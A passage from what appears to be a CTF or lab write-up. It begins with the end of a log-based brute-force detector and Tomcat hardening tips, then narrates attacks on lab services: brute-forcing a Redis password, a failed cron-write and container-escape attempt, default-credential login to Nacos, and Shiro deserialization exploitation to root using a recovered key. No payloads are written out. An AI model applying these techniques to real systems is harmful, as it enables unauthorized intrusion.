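    for ip, count, succeeded in detect_manager_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {count} manager login failures in one window; success afterwards: {succeeded}")
```

On the prevention side, Tomcat's LockOutRealm (the default wrapper around UserDatabaseRealm in server.xml, with `failureCount` and `lockOutTime`) slows guessing down, and the manager application's context.xml can limit access to trusted source addresses with RemoteAddrValve.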

Web7

6379

The Redis service has a password set, and brute-forcing recovers it. After logging in I tried the usual approach of writing a scheduled task, but it had no effect, which was annoying; there is no web side either, so clearly none of the common techniques apply here. I then tried a Docker escape based on the hosts found earlier, but that did nothing either, and finally I modified some sh scripts in the image from the shell I already had, also to no avail.

note

Did not manage to get this working; not sure what is going on.

Web9

8848

Visiting it gives a 404 page. A directory scan reveals the Nacos framework, and a search turned up a default password that allowed logging in. After logging in, some searching turns up a key.

58080

Seeing this page, I remembered that when I was learning Java there was a Spring component with exactly this default page, but I could not recall which one, so I took a screenshot and searched Google, which confirmed my idea: this is a deserialization target. Looking at the requests in Burp I noticed some unusual cookies, and a further search narrowed the target down to Shiro. I then found a tool on GitHub, used it with the key obtained earlier, and got root.